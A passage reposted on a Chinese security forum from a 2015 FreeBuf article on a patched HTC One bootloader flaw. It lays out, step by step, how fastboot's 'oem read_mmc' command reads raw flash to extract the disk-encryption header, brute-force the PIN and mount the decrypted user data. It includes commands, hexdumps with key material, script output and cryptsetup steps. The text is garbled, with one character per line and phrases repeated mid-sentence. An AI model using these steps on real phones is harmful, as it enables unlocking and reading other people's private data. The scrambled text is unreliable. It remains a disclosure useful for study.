论坛
BBS
空间测绘
发表
发布文章
提问答疑
搜索
您还未登录
登录后即可体验更多功能
立即登录
我的收藏
提问答疑
我要投稿
漏洞
[8594] 2015-01-16_利用HTCOne漏洞破解手机PIN密码
文档创建者:
s7ckTeam
浏览次数:
36
最后更新:
2025-01-17
漏洞
36 人阅读
|
0 人回复
s7ckTeam
s7ckTeam
当前离线
积分
-54
6万
主题
-6万
回帖
-54
积分
管理员
积分
-54
发消息
2015-01-16_利用HTCOne漏洞破解手机PIN密码
利
用
H
T
C
O
n
e
漏
洞
破
解
手
机
P
I
N
密
码
F
r
e
e
B
u
f
2
0
1
5
-
0
1
-
1
6
H
T
C
O
n
e
手
机
运
行
的
是
手
机
运
行
的
是
A
n
d
r
o
i
d
4
.
2
.
2
、
、
H
B
O
O
T
1
.
5
4
.
0
0
0
0
,
它
存
在
一
个
名
为
,
它
存
在
一
个
名
为
B
o
o
t
l
o
a
d
e
r
的
漏
洞
。
这
个
漏
洞
早
在
的
漏
洞
。
这
个
漏
洞
早
在
2
0
1
4
年
年
2
月
月
份
就
报
告
给
了
份
就
报
告
给
了
H
T
C
官
方
,
并
在
次
月
就
修
复
了
该
漏
洞
。
在
得
到
官
方
,
并
在
次
月
就
修
复
了
该
漏
洞
。
在
得
到
H
T
C
官
方
同
意
后
,
我
们
现
在
就
将
整
个
漏
洞
利
用
测
试
过
程
官
方
同
意
后
,
我
们
现
在
就
将
整
个
漏
洞
利
用
测
试
过
程
发
布
出
来
。
发
布
出
来
。
r
e
a
d
_
e
m
m
c
命
令
在
2
0
1
1
发
布
的
H
T
C
D
e
s
i
r
e
Z
手
机
中
也
曾
出
现
过
。
这
个
命
令
允
许
攻
击
者
访
问
手
机
内
存
,
并
可
能
获
取
短
信
、
联
系
人
等
敏
感
信
息
。
此
外
,
这
条
命
令
允
许
攻
击
者
通
过
b
r
u
t
e
f
o
r
c
e
自
动
获
取
手
机
P
I
N
/
p
a
s
s
c
o
d
e
。
他
会
打
开
一
个
额
外
的
缺
口
防
止
用
户
定
义
易
猜
解
的
P
I
N
/
p
a
s
s
c
o
d
e
(
比
如
说
就
4
个
数
字
的
P
I
N
)
。
这
是
常
有
的
事
情
,
因
为
日
常
解
锁
手
机
也
是
可
以
使
用
P
I
N
/
p
a
s
s
c
o
d
e
的
。
这
个
攻
击
仅
限
于
这
个
攻
击
仅
限
于
H
T
C
O
n
e
手
机
且
还
得
开
启
全
盘
加
密
,
也
就
是
说
手
机
由
安
卓
加
密
保
护
。
手
机
且
还
得
开
启
全
盘
加
密
,
也
就
是
说
手
机
由
安
卓
加
密
保
护
。
r
e
a
d
_
e
m
m
c
命
令
在
部
分
H
T
C
手
机
中
似
乎
是
一
个
用
来
调
试
的
命
令
。
在
我
们
看
来
,
这
条
命
令
不
应
该
出
现
在
用
户
手
机
上
。
这
篇
文
章
描
述
了
H
T
C
O
n
e
在
安
卓
全
盘
加
密
上
的
强
悍
安
全
机
制
(
A
E
S
加
密
,
合
理
的
密
钥
长
度
,
s
a
l
t
)
。
访
问
闪
存
访
问
闪
存
将
将
H
T
C
O
n
e
关
机
然
后
插
入
电
脑
,
然
后
进
入
关
机
然
后
插
入
电
脑
,
然
后
进
入
f
a
s
t
b
o
o
t
模
式
(
关
机
状
态
按
住
音
量
模
式
(
关
机
状
态
按
住
音
量
+
键
以
及
开
机
键
,
然
后
放
开
开
机
键
)
,
这
键
以
及
开
机
键
,
然
后
放
开
开
机
键
)
,
这
样
我
们
可
以
从
样
我
们
可
以
从
H
B
O
O
T
进
入
进
入
f
a
s
t
b
o
o
t
模
式
。
模
式
。
到
了
这
里
,
我
们
就
可
以
利
用
到
了
这
里
,
我
们
就
可
以
利
用
f
a
s
t
b
o
o
t
进
行
读
取
内
存
操
作
了
,
命
令
如
下
:
进
行
读
取
内
存
操
作
了
,
命
令
如
下
:
c
o
m
m
a
n
d
f
o
r
m
a
t
:
r
e
a
d
_
m
m
c
[
e
m
m
c
/
s
d
]
[
s
t
a
r
t
]
[
#
b
l
o
c
k
s
]
[
#
b
l
o
c
k
s
/
r
e
a
d
]
[
s
h
o
w
]
我
们
来
看
看
参
数
的
定
义
:
第
一
个
参
数
,
告
诉
机
器
从
哪
里
读
取
。
“
e
m
m
c
”
是
读
取
闪
存
,
“
s
d
”
是
读
取
内
存
卡
#
b
l
o
c
k
s
:
读
取
块
的
数
量
#
b
l
o
c
k
s
/
r
e
a
d
:
一
次
读
取
块
的
数
量
s
h
o
w
:
设
置
成
1
来
显
示
结
果
读
取
第
一
个
扇
区
,
可
以
使
用
如
下
命
令
$
f
a
s
t
b
o
o
t
o
e
m
r
e
a
d
_
m
m
c
e
m
m
c
0
1
1
1
.
.
.
(
b
o
o
t
l
o
a
d
e
r
)
r
e
a
d
i
n
g
s
e
c
t
o
r
0
~
0
(
b
o
o
t
l
o
a
d
e
r
)
0
.
.
.
(
b
o
o
t
l
o
a
d
e
r
)
0
(
b
o
o
t
l
o
a
d
e
r
)
D
F
(
b
o
o
t
l
o
a
d
e
r
)
F
F
(
b
o
o
t
l
o
a
d
e
r
)
3
(
b
o
o
t
l
o
a
d
e
r
)
0
(
b
o
o
t
l
o
a
d
e
r
)
2
0
(
b
o
o
t
l
o
a
d
e
r
)
E
0
(
b
o
o
t
l
o
a
d
e
r
)
9
F
(
b
o
o
t
l
o
a
d
e
r
)
3
(
b
o
o
t
l
o
a
d
e
r
)
5
5
(
b
o
o
t
l
o
a
d
e
r
)
A
A
(
b
o
o
t
l
o
a
d
e
r
)
r
e
a
d
s
e
c
t
o
r
d
o
n
e
a
v
e
r
a
g
e
=
1
7
2
O
K
A
Y
[
0
.
3
1
0
s
]
f
i
n
i
s
h
e
d
.
t
o
t
a
l
t
i
m
e
:
0
.
3
1
1
s
从
头
开
始
看
,
我
们
可
以
看
到
许
多
的
0
(
超
过
4
0
0
字
节
)
,
其
结
尾
是
“
5
5
A
A
”
。
在
手
机
上
使
用
A
D
B
S
h
e
l
l
,
我
们
可
以
看
到
用
户
的
数
据
分
区
块
“
m
m
c
b
l
k
0
p
3
7
”
是
从
6
4
2
2
5
2
8
开
始
的
。
在
安
卓
下
它
与
挂
载
的
e
x
t
4
分
区
对
应
s
h
e
l
l
@
a
n
d
r
o
i
d
#
c
a
t
/
p
r
o
c
/
e
m
m
c
d
e
v
:
s
i
z
e
e
r
a
s
e
s
i
z
e
n
a
m
e
.
.
.
m
m
c
b
l
k
0
p
3
7
:
6
8
0
0
0
0
0
0
0
0
0
0
0
0
2
0
0
"
u
s
e
r
d
a
t
a
"
s
h
e
l
l
@
a
n
d
r
o
i
d
:
#
c
a
t
/
s
y
s
/
b
l
o
c
k
/
m
m
c
b
l
k
0
/
m
m
c
b
l
k
0
p
3
7
/
s
t
a
r
t
6
4
2
2
5
2
8
s
h
e
l
l
@
a
n
d
r
o
i
d
:
#
m
o
u
n
t
.
.
.
/
d
e
v
/
b
l
o
c
k
/
m
m
c
b
l
k
0
p
3
7
/
d
a
t
a
e
x
t
4
r
w
,
n
o
s
u
i
d
,
n
o
d
e
v
,
n
o
a
t
i
m
e
,
d
i
s
c
a
r
d
,
n
o
a
u
t
o
_
d
a
_
a
l
l
o
c
,
d
a
t
a
=
o
r
d
e
r
e
d
0
0
因
此
,
攻
击
者
可
以
使
用
“
r
e
a
d
_
m
m
c
”
命
令
,
在
闪
存
中
浏
览
用
户
数
据
分
区
中
的
内
容
,
即
使
用
户
设
定
了
P
I
N
/
密
码
都
无
法
阻
止
。
$
f
a
s
t
b
o
o
t
o
e
m
r
e
a
d
_
m
m
c
e
m
m
c
6
4
2
2
5
3
0
1
1
1
.
.
.
(
b
o
o
t
l
o
a
d
e
r
)
r
e
a
d
i
n
g
s
e
c
t
o
r
6
4
2
2
5
3
0
~
6
4
2
2
5
3
0
(
b
o
o
t
l
o
a
d
e
r
)
0
.
.
.
(
b
o
o
t
l
o
a
d
e
r
)
2
F
(
b
o
o
t
l
o
a
d
e
r
)
6
4
(
b
o
o
t
l
o
a
d
e
r
)
6
1
(
b
o
o
t
l
o
a
d
e
r
)
7
4
(
b
o
o
t
l
o
a
d
e
r
)
6
1
.
.
.
(
b
o
o
t
l
o
a
d
e
r
)
r
e
a
d
s
e
c
t
o
r
d
o
n
e
a
v
e
r
a
g
e
=
1
4
6
O
K
A
Y
[
0
.
3
5
9
s
]
f
i
n
i
s
h
e
d
.
t
o
t
a
l
t
i
m
e
:
0
.
3
5
9
s
“
2
F
6
4
6
1
7
4
6
1
”
字
节
序
列
是
位
于
用
户
数
据
分
区
开
始
的
“
/
d
a
t
a
”
A
S
C
I
I
字
符
串
。
我
们
的
第
一
个
想
法
就
是
实
现
从
闪
存
将
用
户
数
据
进
行
转
储
,
然
而
这
个
过
程
需
要
几
天
甚
至
是
几
个
月
时
间
。
另
一
个
想
法
是
利
用
F
U
S
E
(
用
户
空
间
的
文
件
系
统
)
通
过
U
S
B
连
接
电
脑
转
储
用
户
数
据
。
绕
过
安
卓
全
盘
加
密
(
绕
过
安
卓
全
盘
加
密
(
P
D
E
)
)
在
H
T
C
D
e
s
i
r
e
Z
(
A
n
d
r
o
i
d
2
.
x
)
时
代
还
没
有
出
现
全
盘
加
密
,
我
们
现
在
考
虑
是
否
有
办
法
绕
过
P
D
E
,
使
用
“
r
e
a
d
_
m
m
c
”
漏
洞
。
T
h
o
m
a
s
C
a
n
n
o
n
在
2
0
1
2
年
D
e
f
c
o
n
大
会
上
向
我
们
演
示
了
P
D
E
工
作
过
程
,
使
用
b
r
u
t
e
f
o
r
c
e
破
解
P
I
N
/
p
a
s
s
c
o
d
e
以
及
解
密
用
户
扇
区
数
据
的
脚
本
。
在
那
个
时
候
,
他
使
用
的
是
G
o
o
g
l
e
N
e
x
u
s
S
纯
原
生
,
与
这
里
这
个
例
子
稍
有
不
同
。
我
们
决
定
对
设
备
进
行
加
密
,
“
存
储
>
手
机
存
储
加
密
”
。
通
过
其
方
法
,
我
们
注
意
到
出
现
了
一
个
额
外
的
分
区
,
这
个
分
区
就
是
用
来
存
储
密
钥
的
。
$
h
e
x
d
u
m
p
-
C
e
x
t
r
a
0
0
0
0
0
0
0
0
c
4
b
1
b
5
d
0
0
1
0
0
0
0
0
0
6
8
0
0
0
0
0
0
0
0
0
0
0
0
0
0
|
.
.
.
.
.
.
.
.
h
.
.
.
.
.
.
.
|
0
0
0
0
0
0
1
0
2
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
4
0
0
3
0
0
0
0
0
0
0
0
|
.
.
.
.
.
.
.
.
.
@
.
.
.
.
.
|
0
0
0
0
0
0
2
0
0
0
0
0
0
0
0
0
6
1
6
5
7
3
2
d
6
3
6
2
6
3
2
d
6
5
7
3
7
3
6
9
|
.
.
.
.
a
e
s
-
c
b
c
-
e
s
s
i
|
0
0
0
0
0
0
3
0
7
6
3
a
7
3
6
8
6
1
3
2
3
5
3
6
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
|
v
:
s
h
a
2
5
6
.
.
.
.
.
.
.
.
|
0
0
0
0
0
0
4
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
|
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
|
*
0
0
0
0
0
0
6
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
{
1
5
d
2
9
c
1
6
1
c
5
4
4
0
1
c
|
.
.
.
.
.
.
.
.
.
.
.
.
.
T
@
.
|
0
0
0
0
0
0
7
0
b
4
c
1
e
4
9
1
6
9
1
0
4
b
5
5
2
e
4
7
6
4
3
1
1
3
5
2
a
d
2
d
|
.
.
.
.
i
.
K
U
.
G
d
1
.
R
.
-
|
0
0
0
0
0
0
8
0
b
d
8
c
4
2
8
e
d
6
c
4
8
4
0
0
}
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
|
.
.
B
.
.
.
.
.
.
.
.
.
.
.
.
.
|
0
0
0
0
0
0
9
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
|
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
|
0
0
0
0
0
0
a
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
[
c
7
1
f
3
4
8
0
9
7
0
9
f
d
3
9
|
.
.
.
.
.
.
.
.
.
.
4
.
.
.
.
9
|
0
0
0
0
0
0
b
0
0
b
4
a
9
1
d
9
d
9
d
8
0
0
c
d
]
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
|
.
J
.
.
.
.
.
.
.
.
.
.
.
.
.
.
|
0
0
0
0
0
0
c
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
|
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
|
*
0
0
0
0
0
2
0
0
N
o
t
e
:
对
主
密
钥
及
内
部
数
据
解
密
,
推
荐
大
家
看
看
T
h
o
m
a
s
的
幻
灯
片
。
我
们
正
好
处
于
加
密
头
的
位
置
,
于
是
我
可
以
很
快
得
到
s
h
e
l
l
@
a
n
d
r
o
i
d
#
c
a
t
/
p
r
o
c
/
e
m
m
c
d
e
v
:
s
i
z
e
e
r
a
s
e
s
i
z
e
n
a
m
e
.
.
.
m
m
c
b
l
k
0
p
2
7
:
0
0
0
1
0
0
0
0
0
0
0
0
0
2
0
0
"
e
x
t
r
a
"
s
h
e
l
l
@
a
n
d
r
o
i
d
:
#
c
a
t
/
s
y
s
/
b
l
o
c
k
/
m
m
c
b
l
k
0
/
m
m
c
b
l
k
0
p
2
7
/
s
t
a
r
t
5
8
6
7
9
9
然
后
,
我
们
可
以
再
次
确
认
用
户
数
据
分
区
被
加
密
。
第
一
个
字
节
告
诉
我
们
,
“
T
h
i
s
i
s
a
n
e
n
c
r
y
p
t
e
d
d
e
v
i
c
e
:
)
”
,
这
仅
仅
是
在
H
T
C
O
n
e
中
才
有
的
。
他
之
所
以
能
这
么
写
,
是
因
为
在
默
认
的
e
x
t
4
分
区
中
第
一
个
字
节
并
没
有
使
用
,
其
他
字
节
都
是
随
机
字
节
。
s
h
e
l
l
@
a
n
d
r
o
i
d
:
#
.
/
b
u
s
y
b
o
x
h
e
x
d
u
m
p
-
C
/
d
e
v
/
b
l
o
c
k
/
m
m
c
b
l
k
0
p
3
7
-
n
6
4
0
0
0
0
0
0
0
0
5
4
6
8
6
9
7
3
2
0
6
9
7
3
2
0
6
1
6
e
2
0
6
5
6
e
6
3
7
2
7
9
|
T
h
i
s
i
s
a
n
e
n
c
r
y
|
0
0
0
0
0
0
1
0
7
0
7
4
6
5
6
4
2
0
6
4
6
5
7
6
6
9
6
3
6
5
3
a
2
9
6
f
c
3
a
0
|
p
t
e
d
d
e
v
i
c
e
:
)
o
.
.
|
0
0
0
0
0
0
2
0
2
6
b
c
7
6
e
d
a
8
7
7
e
f
6
a
9
5
2
8
3
2
a
b
2
4
c
e
8
d
5
8
|
&
.
v
.
.
w
.
j
.
(
2
.
$
.
.
X
|
0
0
0
0
0
0
3
0
9
1
f
e
8
e
1
4
9
e
8
1
0
5
a
4
2
8
6
5
6
4
3
c
1
b
e
2
1
1
5
6
|
.
.
.
.
.
.
.
.
(
e
d
<
.
.
.
V
|
0
0
0
0
0
0
4
0
接
着
,
我
们
可
以
确
定
能
够
访
问
这
个
头
,
使
用
f
a
s
t
b
o
o
t
中
“
r
e
a
d
_
m
m
c
”
命
令
对
用
户
数
据
分
区
进
行
加
密
$
f
a
s
t
b
o
o
t
o
e
m
r
e
a
d
_
m
m
c
e
m
m
c
5
8
6
7
9
9
1
1
1
由
此
,
我
们
可
以
编
写
一
个
小
脚
本
来
读
取
P
D
E
头
,
用
户
数
据
分
区
的
第
一
个
扇
区
然
后
通
过
电
脑
进
行
破
解
。
#
p
y
t
h
o
n
b
r
u
t
e
f
o
r
c
e
_
h
t
c
o
n
e
_
o
v
e
r
_
r
e
a
d
e
m
m
c
.
p
y
o
e
m
r
e
a
d
_
m
m
c
e
m
m
c
6
4
2
2
5
2
8
1
1
1
o
e
m
r
e
a
d
_
m
m
c
e
m
m
c
5
8
6
7
9
9
1
1
1
F
o
o
t
e
r
F
i
l
e
:
e
x
t
r
a
M
a
g
i
c
:
0
x
D
0
B
5
B
1
C
4
M
a
j
o
r
V
e
r
s
i
o
n
:
1
M
i
n
o
r
V
e
r
s
i
o
n
:
0
F
o
o
t
e
r
S
i
z
e
:
1
0
4
b
y
t
e
s
F
l
a
g
s
:
0
x
0
0
0
0
0
0
0
0
K
e
y
S
i
z
e
:
2
5
6
b
i
t
s
F
a
i
l
e
d
D
e
c
r
y
p
t
s
:
0
C
r
y
p
t
o
T
y
p
e
:
a
e
s
-
c
b
c
-
e
s
s
i
v
:
s
h
a
2
5
6
E
n
c
r
y
p
t
e
d
K
e
y
:
0
x
1
5
D
2
9
C
1
6
1
C
5
4
4
0
1
C
B
4
C
1
E
4
9
1
6
9
1
0
4
B
5
5
2
E
4
7
6
4
3
1
1
3
5
2
A
D
2
D
B
D
8
C
4
2
8
E
D
6
C
4
8
4
0
0
S
a
l
t
:
0
x
C
7
1
F
3
4
8
0
9
7
0
9
F
D
3
9
0
B
4
A
9
1
D
9
D
9
D
8
0
0
C
D
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
T
r
y
i
n
g
t
o
B
r
u
t
e
f
o
r
c
e
P
a
s
s
w
o
r
d
.
.
.
p
l
e
a
s
e
w
a
i
t
F
o
u
n
d
P
I
N
!
:
0
0
0
0
S
a
v
i
n
g
d
e
c
r
y
p
t
e
d
m
a
s
t
e
r
k
e
y
t
o
&
#
0
3
9
;
k
e
y
f
i
l
e
&
#
0
3
9
;
挂
载
用
户
数
据
加
密
分
区
挂
载
用
户
数
据
加
密
分
区
攻
击
者
可
以
通
过
上
文
轻
松
获
取
P
I
N
/
p
a
s
s
c
o
d
e
,
他
能
正
常
接
通
电
话
,
重
写
或
者
创
建
P
I
N
/
p
a
s
s
c
o
d
e
,
然
后
开
启
A
D
B
,
做
他
想
做
的
任
何
事
。
#
m
k
d
i
r
m
n
t
#
l
o
s
e
t
u
p
/
d
e
v
/
l
o
o
p
0
u
s
e
r
d
a
t
a
.
i
m
g
#
c
r
y
p
t
s
e
t
u
p
–
t
y
p
e
p
l
a
i
n
o
p
e
n
–
c
a
e
s
-
c
b
c
-
e
s
s
i
v
:
s
h
a
2
5
6
–
d
k
e
y
f
i
l
e
/
d
e
v
/
l
o
o
p
0
u
s
e
r
d
a
t
a
#
m
o
u
n
t
/
d
e
v
/
m
a
p
p
e
r
/
u
s
e
r
d
a
t
a
m
n
t
在
这
个
例
子
上
,
我
们
甚
至
可
以
通
过
U
S
B
在
电
脑
上
执
行
“
r
e
a
d
_
m
m
c
”
命
令
。
演
示
详
情
详
见
演
示
详
情
详
见
G
i
t
H
u
b
。
。
[
参
考
来
源
参
考
来
源
S
o
g
e
t
i
,
文
,
文
/
实
习
编
辑
实
习
编
辑
鸢
尾
,
转
载
请
注
明
来
自
鸢
尾
,
转
载
请
注
明
来
自
F
r
e
e
B
u
f
黑
客
与
极
客
(
黑
客
与
极
客
(
F
r
e
e
B
u
f
.
C
O
M
)
)
]
阅
读
原
文
回复
举报
上一个主题
下一个主题
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
回帖后跳转到最后一页
浏览过的版块
Web安全
安全讯息
云安全
IOT
发表
漏洞